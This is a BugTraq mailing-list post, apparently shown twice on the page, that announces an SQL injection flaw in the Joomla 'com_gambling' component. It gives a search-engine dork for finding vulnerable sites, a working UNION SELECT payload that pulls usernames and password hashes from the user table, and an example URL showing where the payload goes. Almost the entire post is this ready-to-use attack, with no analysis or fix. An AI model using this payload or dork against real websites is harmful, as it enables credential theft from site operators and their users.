BugTraq
Back to list
|
Post reply
Joomla (com_gambling) SQL Injection Vulnerabilities
Feb 01 2010 05:14PM
md r00t defacer gmail com
#------------------In The Name Of God------------
# Joomla (com_gambling) SQL Injection Vulnerabilities
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer (at) gmail (dot) com [email concealed]
#Webstie: www.r00t.gigfa.com
#Forum: http://forum.aria-security.com
#
###################################
#Google D0rk:
# inurl:"com_gambling"
###################################
#Exploit:
#---------
# -9999+union+select+1,concat(username,0x3a,password)+from+mos_users/*
###################################
#Example:
#
#http://www.Site.com/index.php?option=com_gambling&Itemid=64&task=showGa
me&gamblingSid=10&gamblingEvent=[Exploit]
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
# Joomla (com_gambling) SQL Injection Vulnerabilities
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer (at) gmail (dot) com [email concealed]
#Webstie: www.r00t.gigfa.com
#Forum: http://forum.aria-security.com
#
###################################
#Google D0rk:
# inurl:"com_gambling"
###################################
#Exploit:
#---------
# -9999+union+select+1,concat(username,0x3a,password)+from+mos_users/*
###################################
#Example:
#
#http://www.Site.com/index.php?option=com_gambling&Itemid=64&task=showGa
me&gamblingSid=10&gamblingEvent=[Exploit]
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
[ reply ]